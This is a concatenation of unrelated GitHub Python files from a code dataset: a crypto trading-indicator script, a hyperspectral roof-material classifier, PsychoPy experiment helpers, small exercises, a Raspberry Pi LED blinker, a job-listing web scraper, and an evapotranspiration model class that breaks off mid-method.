time_interval)\n\n # save_to_file(\"e://bin//data//\", \"klines-neo\", _klines)\n _klines = get_pickled('e://bin/data//', \"klines-neo\")\n _klines = _klines[:-3]\n\n _closes = np.array(list(map(lambda _x: float(_x.closing), _klines)))\n # find_valuable_alts(_closes)\n\n _is, _1 = is_second_golden_cross(_klines)\n\n bf = is_bull_flag(_klines)\n # fw0 = is_falling_wedge_0(_closes)\n fw = is_falling_wedge(_klines)\n\n macd, macdsignal, macdhist = talib.MACD(_closes, fastperiod=12, slowperiod=26, signalperiod=9)\n r = relative_strength_index(_closes)\n\n hl = is_higher_low(r, 45.0, 33, -1)\n\n is_it = is_tradeable(_closes, r, macd, macdsignal)\n\n res0 = is_second_golden_cross(_klines[:-1])\n res = is_first_golden_cross(_klines)\n d = is_drop_below_ma50_after_rally(_klines)\n d1 = is_drop_below_ma200_after_rally(_klines)\n\n # _closes = np.array(list(map(lambda _x: float(_x[4]), _klines)))\n # _opens = np.array(list(map(lambda _x: float(_x[1]), _klines)))\n # _high = list(map(lambda _x: float(_x[2]), _klines))\n # _low = list(map(lambda _x: float(_x[3]), _klines))\n\n _closes = np.array(list(map(lambda _x: float(_x.closing), _klines)))\n _opens = np.array(list(map(lambda _x: float(_x.opening), _klines)))\n _high = list(map(lambda _x: float(_x.highest), _klines))\n _low = list(map(lambda _x: float(_x.lowest), _klines))\n\n bv, bi = bear_cross(_closes)\n _ind, _rel_ind, _diff = index_of_max_mas_difference(_closes)\n _res = []\n\n _r = compute_wider_interval(is_tilting, _klines)\n\n # for i in range(0, 24):\n # if i == 0:\n # _res.append(is_tilting(_closes))\n # else:\n # _res.append(is_tilting(_closes[:-i]))\n # _is_it = is_tilting(_closes)\n ## MACD\n\n # _out = is_second_golden_cross(_closes)\n # _first = is_first_golden_cross(_klines)\n #\n start = 0\n # stop = -5*60-30-32\n stop = -1\n # stop = -2650\n # save_to_file(\"/juno/\", \"klines-theta\", _klines[start:stop:1])\n\n # out = is_second_golden_cross(_closes[:stop])\n\n # t = is_tradeable(_closes, r, macd, macdsignal)\n\n # rsi_normal_cond = is_rsi_slope_condition(r, 45, 30, start, stop)\n # rsi_normal_tight = is_rsi_slope_condition(r, 30, 20, start, stop)\n # macd_normal_cond = is_macd_condition(macd, 45, start, stop)\n # divergence_ratio = is_signal_divergence_ratio(macd, macdsignal, 0.1, start, stop)\n # is_hl = is_higher_low(r, 45, start, stop)\n\n plt.subplot2grid((3, 1), (0, 0))\n plt.plot(macd[start:stop:1], 'blue', lw=1)\n plt.plot(macdsignal[start:stop:1], 'red', lw=1)\n # plt.plot(ema9[-wins:], 'red', lw=1)\n # plt.plot(macd[-wins:], 'blue', lw=1)\n\n # plt.subplot2grid((2, 1), (7, 0))\n #\n plt.plot(macd[start:stop:1] - macdsignal[start:stop:1], 'k', lw=2)\n plt.plot(np.zeros(len(macd[start:stop:1])), 'y', lw=2)\n # plt.axhline(y=0, color='b', linestyle='-')\n plt.subplot2grid((3, 1), (1, 0))\n plt.plot(r[start:stop:1], 'red', lw=1)\n\n ma40 = talib.MA(_closes, timeperiod=40)\n\n plt.subplot2grid((3, 1), (2, 0))\n plt.plot(ma40[start:stop:1], 'black', lw=1)\n plt.plot(_closes[start:stop:1], 'green', lw=1)\n\n _outcome = check_ma_crossing(ma40, _high)\n _zero = find_zero(macd[start:stop:1] - macdsignal[start:stop:1])\n\n _min_val, _min_ind = find_first_minimum(macd[start:stop:1] - macdsignal[start:stop:1], _window=1)\n\n _price = get_bid_price(macd[start:stop:1] - macdsignal[start:stop:1], _low)\n\n _p = get_setup_entry(_klines)\n\n plt.show()\n\n ma200 = talib.MA(_closes, timeperiod=200)\n # ma100 = talib.MA(_closes, timeperiod=100)\n ma50 = talib.MA(_closes, timeperiod=50)\n # ma20 = talib.MA(_closes, timeperiod=20)\n # ma7 = talib.MA(_closes, timeperiod=7)\n\n _ma200 = ma200[start:stop:1]\n _ma50 = ma50[start:stop:1]\n\n _mv, _mi = find_first_maximum(_ma200[-500:], 10)\n _mv2, _m2i = find_maximum_2(_ma200, 10)\n _minv, _mini = find_minimum_2(_ma200, 10)\n _maxv, _maxi = find_maximum_2(_ma200[-_mini:], 10)\n\n _cond1 = True\n if _ma200[-1] < _maxv:\n _cond1 = (_maxv - _minv) / _minv > 0.05\n\n _cond2 = (_ma200[-1] - _minv) / _minv > 0.05 and _mini > 500\n\n _bc_val, _bc_ind = bull_cross(_closes)\n\n _cond3 = _bc_ind < 10\n\n _fmax_v, _fmax_i = find_first_maximum(_ma200, 10)\n _fminv, _fmin_i0 = find_first_minimum(_ma200[:-_fmax_i], 10)\n _fmin_i = _fmax_i + _fmin_i0 - 1\n\n _fmax_v0, _fmax_i0_ = find_first_maximum(_ma200[:-_fmin_i], 10)\n _fmax_i0 = _fmax_i0_ + _fmin_i - 1\n\n _cond4_bear = not (_fmax_v - _fminv) / _fminv > 0.05 and _fmax_v - _fmax_v0 < 0\n\n _is = is_bull_cross_in_bull_mode(_closes)\n\n _first_gc = find_first_golden_cross(_ma50, _ma200, 50)\n\n below_ma = drop_below_ma(_ma200[-_first_gc[1]:], _closes[-_first_gc[1]:], 5)\n\n _max_high = find_local_maximum(_high[-_first_gc[1]:], 100)\n rally = (_max_high[0] - _first_gc[0]) / _first_gc[0] # 48, 82 %\n\n if rally > 0.5 and below_ma[1] > 0:\n i = 1\n\n k = 1\n # _max_200 = find_local_maximum(_ma200, 200) # first a long-period maximum\n # _min_200 = find_minimum_2(_ma200, 200) # first a long-period minimum\n # _max_200_1 = find_first_maximum(_ma200, 5) # second lower max\n # _min_200_1 = find_first_minimum(_ma200, 25) # first higher minimum\n #\n #\n # fall = (np.max(_high[-500:])-np.min(_low[-500:]))/np.max(_high[-500:]) # > 22%\n #\n # # _max_200_1 = find_first_maximum(_ma200, 5)\n #\n # _max = find_first_maximum(_ma50, 10)\n # _min = find_minimum(_ma50[-_max[1]:])\n #\n # _max_g = find_local_maximum(_ma50, 50)\n # _max_l = find_local_maximum(_ma50[-_max_g[1]:], 50)\n # _min_l = find_minimum(_ma50[-_max_g[1]:-_max_l[1]])\n # _min_low_l = find_minimum(_low[-_max_g[1]:-_max_l[1]])\n #\n # _min_l_ind = -_max_l[1] + _min_l[1]\n # _min_low_l_ind = -_max_l[1] + _min_low_l[1]\n # _max_l_ind = - _max_l[1]\n #\n # _max_high_l = find_local_maximum(_high[_min_l_ind:-_max_l[1]], 10)\n # _min_before_local_max = find_minimum(_low[_max_l_ind:])\n # rise = (_max_high_l[0]-_min_low_l[0])/_min_low_l[0] # > 15%\n # drop = (_max_high_l[0] - _min_before_local_max[0]) / _max_high_l[0] # > 10%\n # _ma50[-_max_l[1] - 44] - _min_l[0]\n # _ma200[:-_max[1] + 1] # first n elements until max element\n\n # _max_b = find_local_maximum(_ma200[-_max[1]:_min[1]], 10)\n\n # 43, 36, 20 %\n\n # if fall > 0.22 and rise > 0.15 and drop > 0.1 and np.abs(_max_l_ind) > 50:\n # i = 7\n\n _ma50 = ma50[start:stop:1]\n\n _max_50 = find_local_maximum(_ma50, 200) # first a long-period maximum\n _min_50 = find_minimum_2(_ma50, 200) # first a long-period minimum\n _max_50_1 = find_first_maximum(_ma50, 10) # second lower max\n _min_50_1 = find_first_minimum(_ma50, 25) # first higher minimum\n\n if _min_50[0] < _min_50_1[0] < _max_50_1[0] < _max_50[0] and _max_50[1] > _min_50[1] > _max_50_1[1] > _min_50_1[1]:\n aja = 1\n\n # HL_ma50_reversal_cond = _min_50[0] < _min_50_1[0] < _max_50_1[0] < _max_50[0] and _max_50[1] > _min_50[1] > _max_50_1[1] > _min_50_1[1]\n # min_after_max_low_variance = _min_200[0] < _max_200[0] and _max_200[1] > _min_200[1] and np.std(ma200[-200:]) / np.mean(ma200[-200:]) < 0.02\n # before_second_golden_cross_cond = _min_50[0] < _ma200[-_min_50[1]] and _max_50_1[0] > _ma200[-_max_50_1[1]] and _max_50_1[0] > _ma200[\n # -_max_50_1[1]] and _min_50_1[0] < _ma200[-_min_50_1[1]]\n\n # if _min_200[0] < _max_200[0] and _max_200[1] > _min_200[1] and np.std(ma200[-200:])/np.mean(ma200[-200:]) < 0.02:\n # aja = 1\n #\n # if _min_50[0] < _ma200[-_min_50[1]] and _max_50_1[0] > _ma200[-_max_50_1[1]] and _max_50_1[0] > _ma200[-_max_50_1[1]] and _min_50_1[0] < _ma200[-_min_50_1[1]]:\n # asd = 1\n\n # if HL_ma50_reversal_cond and min_after_max_low_variance and before_second_golden_cross_cond:\n # asd = 1\n\n # _ma200[:-_max[1] + 1] # first n elements until max element\n\n # _max_b_50 = find_local_maximum(_ma50[-_max_50[1]:_min_50[1]], 10)\n\n _curr_rsi = get_avg_last_2(r, stop)\n\n _curr_ma_50 = get_avg_last(ma50, stop)\n # _curr_ma_20 = get_avg_last(ma20, stop)\n # _curr_ma_7 = get_avg_last(ma7, stop)\n # _curr_ma_7_2 = get_avg_last_2(ma7, stop)\n\n # l1 = get_last(ma7, stop)\n # l2 = get_last_2(ma7, stop)\n\n # b = bullishness_2(_opens, _closes, ma100, ma50, ma20, stop)\n\n plt.subplot2grid((3, 1), (2, 0))\n # plt.plot(ma200[start:stop:1], 'green', lw=1)\n # plt.plot(ma50[start:stop:1], 'red', lw=1)\n\n plt.plot(_ma200, 'black', lw=1)\n plt.plot(_ma200[-_first_gc[1]:], 'green', lw=1)\n plt.plot(_ma50, 'red', lw=1)\n # plt.plot(_ma200[:-_min_200[1] + 1], 'green', lw=1)\n # plt.hlines(_min_200[0], 0, len(_ma200[:-_min_200[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_200[0], 0, len(_ma200[:-_max_200[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_200_1[0], 0, len(_ma200[:-_max_200_1[1] + 1]), 'black', lw=1)\n # plt.vlines(len(_ma200) - _min_200[1], np.min(_ma200[~np.isnan(_ma200)]), np.max(_ma200[~np.isnan(_ma200)]), 'black', lw=1)\n # plt.vlines(len(_ma200) - _max_200_1[1], np.min(_ma200[~np.isnan(_ma200)]), np.max(_ma200[~np.isnan(_ma200)]), 'black',\n # lw=1)\n # plt.vlines(len(_ma200) - _max_200[1], np.min(_ma200[~np.isnan(_ma200)]), np.max(_ma200[~np.isnan(_ma200)]), 'black', lw=1)\n # plt.plot(_ma200[:-_max_200[1] + 1], 'yellow', lw=1)\n\n # plt.plot(_ma50, 'black', lw=1)\n # plt.plot(_ma50[:-_min_50[1] + 1], 'green', lw=1)\n # plt.hlines(_min_50[0], 0, len(_ma50[:-_min_50[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_50[0], 0, len(_ma50[:-_max_50[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_50_1[0], 0, len(_ma50[:-_max_50_1[1] + 1]), 'black', lw=1)\n # plt.vlines(len(_ma50) - _min_50[1], np.min(_ma50[~np.isnan(_ma50)]), np.max(_ma50[~np.isnan(_ma50)]), 'black', lw=1)\n # plt.vlines(len(_ma50) - _max_50_1[1], np.min(_ma50[~np.isnan(_ma50)]), np.max(_ma50[~np.isnan(_ma50)]), 'black',\n # lw=1)\n # plt.vlines(len(_ma50) - _max_50[1], np.min(_ma50[~np.isnan(_ma50)]), np.max(_ma50[~np.isnan(_ma50)]), 'black', lw=1)\n # plt.plot(_ma50[:-_max_50[1] + 1], 'yellow', lw=1)\n\n # plt.plot(_ma50[:-_max_50_1[1] + 1], 'red', lw=1)\n # plt.plot(ma20[start:stop:1], 'blue ', lw=1)\n plt.show()\n # t = get_time_from_binance_tmstmp(_klines[-1][0])\n i = 1\n\n # ba = BuyAsset('ZRX', 0.00002520, 0.00002420, 0.00005520, 1)\n # take_profit(ba)\n i = 1\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sroziewski/trading-bot","sub_path":"ta.py","file_name":"ta.py","file_ext":"py","file_size_in_byte":33877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"307024476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 7 10:42:17 2022\n\n@author: Stian\n\"\"\"\n\n# Shallow ML on spectral lib\n\n\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nimport spectral\nimport matplotlib.pyplot as plt\n\nimport spectral.io.envi as envi\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\nfrom mycolorpy import colorlist as mcp\n\n\n# =============================================================================\n# Load data\n# =============================================================================\n\n\nspec_lib = envi.open(\"E:/M-DV-STeien/juni2021/04/hs/2021_04_stack30cm_roof_speclib_python.hdr\")\n#spec_lib = spectral.SpyFile.load(spec_lib)\nroofs = Image.open(\"E:/M-DV-STeien/databaseFKB2019/04/04_bygning_30cm.tif\")\nroofs = np.array(roofs)\n\ndf = pd.DataFrame(spec_lib.spectra, index=spec_lib.names, columns=spec_lib.bands.centers)\ndf.columns = np.floor(df.columns*1000)/1000\n\n# =============================================================================\n# Combine items with same strucutes, gray/red metal --> metal\n# =============================================================================\n# items_replace = {\"black ceramic\":\"ceramic\", \n# \"black concrete\":\"concrete\",\n# \"brown concrete\":\"concrete\",\n# \"red concrete\":\"concrete\",\n# \"dark metal\": \"metal\",\n# \"grayish metal\": \"metal\",\n# \"light metal\": \"metal\",\n# \"red metal\": \"metal\"}\n# df = df.rename(index=items_replace)\n\n\ndf[\"label\"] = df.index\n\ndf[\"label\"].replace(df.index.unique().to_numpy(), \n [i for i in range(len(df.index.unique()))], inplace= True)\n\n# =============================================================================\n# Load data HS \n# =============================================================================\n\nvnir_raw = spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/VNIR30cm/2021_04_vnir30cm.hdr\")\nswir_raw = spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/SWIR30cm/2021_04_swir30cm.hdr\")\n\n\n\nvnir = spectral.SpyFile.load(vnir_raw)\nswir = spectral.SpyFile.load(swir_raw)\n\nhs = np.dstack([vnir, swir])\n\nhs_small = hs[:, :, :]\nroofs = roofs[:, :]\nplt.imshow(np.dstack([hs_small[:,:,76],hs_small[:,:,46],hs_small[:,:,21]])/2500)\n\n# =============================================================================\n# Shallow ML pixelwise\n# =============================================================================\nsc = StandardScaler()\nsc.fit(df.drop(columns=[\"label\"]))\n\n\nknn = KNeighborsClassifier()\nknn.fit(df.drop(columns=[\"label\"]),\n df.label)\n\nlr = LogisticRegression(max_iter=200)\nlr.fit(df.drop(columns=[\"label\"]),\n df.label)\n\nsvc = SVC(verbose=1)\nsvc.fit(df.drop(columns=[\"label\"]),\n df.label)\n\nrf = RandomForestClassifier(verbose=1)\nrf.fit(df.drop(columns=[\"label\"]),\n df.label)\n\n# =============================================================================\n# Get right wavelength for all sets\n# =============================================================================\n\nX = pd.DataFrame(hs_small.reshape(hs_small.shape[0]*hs_small.shape[1],hs_small.shape[2]),\n columns=np.concatenate([vnir.bands.centers,swir.bands.centers]))\n\nX.columns = np.floor(X.columns)/1000\n#df.columns = np.concatenate(np.round(df.columns, 4), [\"label\"])\nX = X.loc[:,~X.columns.duplicated()]\n\nX = X[df.drop(columns=[\"label\"]).columns]\n\n# =============================================================================\n# Predict a small set\n# =============================================================================\ndef predict(estimator):\n roof = roofs.reshape(roofs.shape[0]*roofs.shape[1])\n test = X.to_numpy()[roof > 0.01]\n test_indx = np.argwhere(roof > 0.01)\n pred = estimator.predict(test)\n maps = np.zeros((hs_small.shape[0],\n hs_small.shape[1])).reshape(hs_small.shape[0]*hs_small.shape[1]) -1\n maps[test_indx.flatten()] = pred\n maps = maps.reshape(hs_small.shape[0], hs_small.shape[1])\n pred = maps\n return pred\n\npred = predict(lr)\n\npred = knn.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\npred = lr.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\npred = svc.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\npred = rf.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\n\n# =============================================================================\n# Show results\n# =============================================================================\n\npred[roofs < 0.01] = -1\n\n\nticks = [\"None\"]\nticks.extend(df.index.unique().to_list())\n\ncolors=mcp.gen_color(cmap=\"tab20\",n=6)\ncolormap = ListedColormap(colors)\n\nplt.imshow(t, cmap=colormap)\ncbar = plt.colorbar(ticks=[0,1,2,3,4,5])\ncbar.ax.set_yticklabels(new_classes.keys())\nplt.show()\n\n\n# =============================================================================\n# Reduce class with earlier reuslts \n# =============================================================================\n\nlabels = np.load(\"label.npy\")\nt = ticks[labels]\n \n\nclasses= {\"None\":\"None\",\n \"eternit\": \"eternit\",\n \"tar roofing paper\": \"tar roofing paper\",\n \"black ceramic\":\"ceramic\", \n \"black concrete\":\"concrete\",\n \"brown concrete\":\"concrete\",\n \"red concrete\":\"concrete\",\n \"dark metal\": \"metal\",\n \"grayish metal\": \"metal\",\n \"light metal\": \"metal\",\n \"red metal\": \"metal\"}\n\nfor i in classes:\n key = i\n value = classes[key]\n t[t == key] = value\n\nnew_classes = {\"None\": 0,\n \"ceramic\": 1,\n \"concrete\": 2,\n \"eternit\": 3,\n \"metal\": 4,\n \"tar roofing paper\":5}\n\nfor i in new_classes:\n key = i\n value = new_classes[key]\n t[t == key] = value\n\nt.astype(int)\n\n","repo_name":"stianteien/M_DV_V2022","sub_path":"spectral_library/ml_speclib.py","file_name":"ml_speclib.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14585829567","text":"from code.load_data import read_text_from_file\nfrom code.check_exit import check_exit\nfrom psychopy import visual, gui, event, clock\nfrom os import listdir\nfrom os.path import join\n\n\ndef part_info(test=False):\n if test:\n info = {'Kod badanego': '', 'Wiek': '20', 'Płeć': 'M'}\n else:\n info = {'Kod badanego': '', 'Wiek': '', 'Płeć': ['M', \"K\"]}\n dict_dlg = gui.DlgFromDict(dictionary=info, title='Transrel werbalny')\n if not dict_dlg.OK:\n exit(1)\n info = {'Part_id': info['Kod badanego'],\n 'Part_age': info[\"Wiek\"],\n 'Part_sex': info[\"Płeć\"]}\n return info, f\"{info['Part_id']}_{info['Part_sex']}_{info['Part_age']}\"\n\n\ndef show_info(win, file_name, text_size, text_color, screen_res, insert=''):\n msg = read_text_from_file(file_name, insert=insert)\n msg = visual.TextStim(win, color=text_color, text=msg, height=text_size, wrapWidth=screen_res['width'])\n msg.draw()\n win.flip()\n key = event.waitKeys(keyList=['f7', 'return', 'space'])\n if key == ['f7']:\n raise Exception('Experiment finished by user on info screen! F7 pressed.')\n win.flip()\n\n\ndef show_image(win, file_name, size, key='f7'):\n image = visual.ImageStim(win=win, image=file_name, interpolate=True, size=size)\n image.draw()\n win.flip()\n clicked = event.waitKeys(keyList=[key, 'return', 'space'])\n if clicked == [key]:\n exit(0)\n win.flip()\n\n\ndef show_instructions(win, config, screen_res, block_type):\n for file in [f for f in listdir(\"messages\") if f.split(\"_\")[1] == block_type]:\n if file.endswith(\"txt\"):\n show_info(win, join('.', 'messages', file), text_color=config[\"text_color\"], text_size=config[\"text_size\"], screen_res=screen_res)\n elif file.endswith(\"PNG\") or file.endswith(\"png\"):\n show_image(win, join('.', 'messages', file), list(screen_res.values()))\n else:\n raise Exception(f\"{file} is incorrect instruction type. Use txt or png\")\n\n\ndef show_clock(clock_image, trial_clock, config):\n if config[\"show_clock\"] and trial_clock.getTime() > config[\"clock_show_time\"]:\n clock_image.draw()\n\n\ndef show_timer(timer, trial_clock, config):\n if config[\"show_timer\"]:\n timer.setText(config[\"trial_time\"] - int(trial_clock.getTime()))\n timer.draw()\n\n\ndef draw_stim_list(stim_list: list, flag: bool):\n for elem in stim_list:\n elem.setAutoDraw(flag)\n\n\ndef show_stim(stim, stim_time: int, trial_clock: clock.Clock, win: visual.Window):\n if stim_time == 0:\n return\n if stim is not None:\n stim.draw()\n win.callOnFlip(trial_clock.reset)\n win.callOnFlip(event.clearEvents)\n win.flip()\n while trial_clock.getTime() < stim_time:\n if stim is not None:\n stim.draw()\n check_exit()\n win.flip()\n\n win.flip()\n","repo_name":"cogscilab-experiment-y/Transrel_verbal","sub_path":"code/show_info.py","file_name":"show_info.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38090277583","text":"\"\"\"\n Ecrire un algo qui demande un nombre entier positif et qui nous retourne le carré de ce nombre\n Un carré est le résultat de la multiplication du nombre par lui même\n On peux pousser un peux et ajouter la vérification de la donnée avec une boucle \"while\"\n\"\"\"\n\nNombrePositif = int(input(\"Entrez votre nombre entier positif svp :\"))\nwhile(NombrePositif<1):\n NombrePositif = int(input(\"Entrez votre nombre entier positif svp :\"))\nCarreNombre = (NombrePositif * NombrePositif)\n\ni=0\nNombreVerif=0\nprint(\"\\nLa vérification du résultat est le suivant : \")\nwhile i < NombrePositif :\n i+=1\n NombreVerif += NombrePositif\n print(\"Itération \",i,\" ->\", NombreVerif)\n\nprint(\"Le total est donc le suivant \",CarreNombre)","repo_name":"FlorentBch/Algo","sub_path":"Algo/1.5_Carre.py","file_name":"1.5_Carre.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39631739107","text":"import time\nimport RPi.GPIO as GPIO\n\noutput_pin = 7 # pin to configure and use as an output\n\n# set the mode of the GPIO pin to an output\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(output_pin, GPIO.OUT)\n\n# loop 10 times, turning light on and off each loop\nfor i in range(10):\n GPIO.output(output_pin, True) # turn on\n time.sleep(2) # wait 2 seconds\n GPIO.output(output_pin, False) # turn off \n time.sleep(2) # wait 2 seconds\n\nGPIO.cleanup()\nprint(\"Done!\")\n\n","repo_name":"ballarat-hackerspace/raspberry_pi_workshop","sub_path":"code/week2_toggling.py","file_name":"week2_toggling.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23929625267","text":"from lxml import etree\nimport json\nimport requests\n\nimport MySQLdb\nconn = MySQLdb.connect(\n host='localhost', # mysql所在主机的ip\n port=3306, \t\t # mysql的端口号\n user=\"root\", # mysql 用户名\n password=\"123456\", # mysql 的密码\n db=\"piaochong\", # 要使用的库名\n charset=\"utf8\" # 连接中使用的字符集\n)\ncursor = conn.cursor() # 游标\n\nproxies={\n 'http':'116.208.52.41:9999'\n}\ncount=0\nfor i in range(20):\n url='https://fe-api.zhaopin.com/c/i/sou?start=%s&pageSize=90&cityId=530&workExperience=-1&education=-1&companyType=-1&employmentType=-1&jobWelfareTag=-1&kw=python&kt=3&_v=0.99620415&x-zp-page-request-id=3c96690e724e4983814780e67dc0e2bd-1562140016350-702800&x-zp-client-id=3f37f35c-eb68-4e6e-b6c2-74b7169cc215'%(i*90)\n html_text = requests.get(url=url,proxies=proxies).text\n json_obj = json.loads(html_text)\n count+=1\n print(count,'*\\n*\\n*\\n*\\n*\\n*\\n*\\n*\\n*\\n*\\n')\n\n for each_data in json_obj['data']['results']:\n url = each_data['positionURL']\n content = requests.get(url).content #手动编码二进制\n element_obj = etree.HTML(content)\n try:\n a=element_obj.xpath(\"//h3[@class='summary-plane__title']//text()\")[0]\n b=element_obj.xpath(\"//span[@class='summary-plane__salary']//text()\")[0]\n c=element_obj.xpath(\"//ul[@class='summary-plane__info']//text()\")[0]\n d=('').join(element_obj.xpath(\"//div[@class='describtion__detail-content']//text()\"))\n e=element_obj.xpath(\"//a[@class='company__title']//text()\")[0]\n f=element_obj.xpath(\"//div[@class='company__description']//text()\")[0]\n print(a,b,c,d,e,f)\n cursor.execute(\"insert into zhilian (txt1,txt2,txt3,txt4,txt5,txt6) values ('%s','%s','%s','%s','%s','%s')\" % (a,b,c,d,e,f))\n conn.commit()\n except:\n pass\ncursor.close()\nconn.close()\n\n\n\n\n # print(element_obj.xpath('//div[@class=\"summary-plane__bottom\"]//text()'))\n # print(element_obj.xpath('//*[@class=\"summary-plane__info\"]//text()'))\n # print(element_obj.xpath('//div[@class=\"describtion\"]//text()'))\n # print(element_obj.xpath('//a[@class=\"company__title\"]//text()'))\n # print(element_obj.xpath('//*[@class=\"company__description\"]//text()'))\n\n\n# element_obj = etree.HTML(content)\n# a_url_list = element_obj.xpath('//a[@class=\"contentpile__content__wrapper__item__info\"]')\n# print(a_url_list,len(a_url_list))\n#\n# '''\n# 第一页\n# https://sou.zhaopin.com/?jl=530&kw=python&kt=3&sf=0&st=0\n# 第二页\n# https://sou.zhaopin.com/?p=2&jl=530&kw=python&kt=3&sf=0&st=0\n# '''\n\n\n# from urllib import request\n# import gzip\n# headers = {\n# 'accept-encoding': 'gzip'\n# }\n# url='https://jobs.zhaopin.com/CC442548133J00221073106.htm'\n# req = request.Request(url=url,headers=headers)\n# resp=request.urlopen(req)\n# aa=resp.read()\n# print(gzip.decompress(aa).decode('utf-8'))\n\n","repo_name":"hl1234567896/pp","sub_path":"com/baizhi/homework/day01_zhilian.py","file_name":"day01_zhilian.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36530010328","text":"\"\"\"\nCreated: Tuesday 1st December 2020\n@author: John Moncrieff (j.moncrieff@ed.ac.uk)\nLast Modified on 5 March 2021 14:00 \n\nDESCRIPTION\n===========\nThis package contains the model class object\n\n\"\"\"\n\nimport numpy as np\nimport math\n\nclass Model():\n '''\n The main model class\n '''\n # Define all the instance variables\n def __init__(self, inpt):\n self.inpt = inpt\n self.sol = self.inpt[\"solar\"]\n self.rn = 0\n self.u = self.inpt[\"wind\"]\n self.airT = self.inpt[\"airt\"]\n self.vp = self.inpt[\"vp\"]\n self.rs = self.inpt[\"rs\"]\n self.c1_svp = 6790.4985 # constant used in svp calculation\n self.c2_svp = 52.57633\n self.c3_svp = 5.02808\n self.absZero = 273.15 # Absolute zero\n self.svp = self.c_satVapPres(self.airT)\n self.Td = self.dewpoint()\n self.Tw = self.wetbulb()\n self.esTw = self.c_satVapPres(self.Tw)\n self.esTd = self.c_satVapPres(self.Td)\n self.NumSurfaceTypes = 11\n self.ustar = self.u/10 # rough rule of thumb\n self.vonKarman = 0.41\n self.sfcs = [\"grass (dry)\", \"bare soil (dry)\", \"cereals (dry)\", \"conifers (dry)\",\n \"upland (dry)\",\"grass (wet)\", \"bare soil (wet)\", \"cereals (wet)\",\n \"conifers (wet)\", \"upland (wet)\", \"water\"]\n self.surface = self.inpt[\"sfc\"]\n self.index = self.sfcs.index(self.inpt[\"sfc\"])\n \n self.tlist = [self.airT + 273.15, self.Tw + 273.15, self.Td + 273.15, self.svp, self.vp, self.esTw, self.esTd]\n \n self.srftype={\n 'grass (dry)': {'albedo': 0.25, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 40},\n 'bare soil (dry)': {'albedo': 0.15, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 100},\n 'cereals (dry)': {'albedo': 0.25, 'z': 0.35, 'z0': 0.06, 'd': 0.15, 'minrs': 40},\n 'conifers (dry)': {'albedo': 0.12, 'z': 10.0, 'z0': 0.80, 'd': 9, 'minrs': 70},\n 'upland (dry)': {'albedo': 0.25, 'z': 0.10, 'z0': 0.05, 'd': 0.05, 'minrs': 110},\n 'grass (wet)': {'albedo': 0.28, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 0.001},\n 'bare soil (wet)': {'albedo': 0.20, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 0.001},\n 'cereals (wet)': {'albedo': 0.13, 'z': 0.35, 'z0': 0.06, 'd': 0.15, 'minrs': 0.001},\n 'conifers (wet)': {'albedo': 0.12, 'z': 10.0, 'z0': 0.80, 'd': 9, 'minrs': 0.001},\n 'upland (wet)': {'albedo': 0.22, 'z': 0.10, 'z0': 0.05, 'd': 0.05, 'minrs': 0.001},\n 'water': {'albedo': 0.05, 'z': 0.01, 'z0': 0.001, 'd': 0.001, 'minrs': 0.001}\n }\n # print(self.srftype['grass (dry)']['z0'])\n# print(self.srftype['conifers (wet)']['albedo'])\n \n self.stefanC = 0.0000000567 # Stefan-Boltzmann\n self.gamma = 0.66\n # psychrometric constant for temperatures in\n # degrees C and vapour pressures in mbar\n # need to make the next three temperature dependent\n self.cp = 1005 # specific heat of air (J kg-1)\n self.lhv = 2465000 # latent heat of vapourisation (J kg-1)\n self.rho = 1.204 # kg m-3 at 20 C\n self.tallcrops = ['conifers (dry)', 'conifers (wet)']\n \n # self.parcel = [ # point coordinates:\n# [self.airT+273.15, self.vp], # airT, vp\n# [self.airT+273.15, 17.04], # airT, svp\n# [self.Tw+273.15, self.esTw], # Tw, esTw\n# [self.Td+273.15, self.vp] # Td, vp\n# ]\n \n def wind_profile(self,sfc):\n '''returns wind speed at the height of the canopy from a \n 2 m measured wind speed\n '''\n self.ustar = self.inpt[\"wind\"]/10\n return (self.ustar/self.vonKarman) * math.log(self.srftype[sfc][\"z\"]/self.srftype[sfc][\"z0\"])\n \n def c_ra(self, sfc):\n '''calculates aerodynamic resistances\n using eqns. 4.36 and 4.38 of MORECS report\n '''\n u =self.wind_profile(sfc)\n if sfc in self.tallcrops:\n self.ra = 56.3/u\n else: \n self.ra = (6.25 / u) * math.log(10 / self.srftype[sfc][\"z0\"]) \\\n * math.log(6 / self.srftype[sfc][\"z0\"])\n return self.ra\n \n def calculateLE(self, 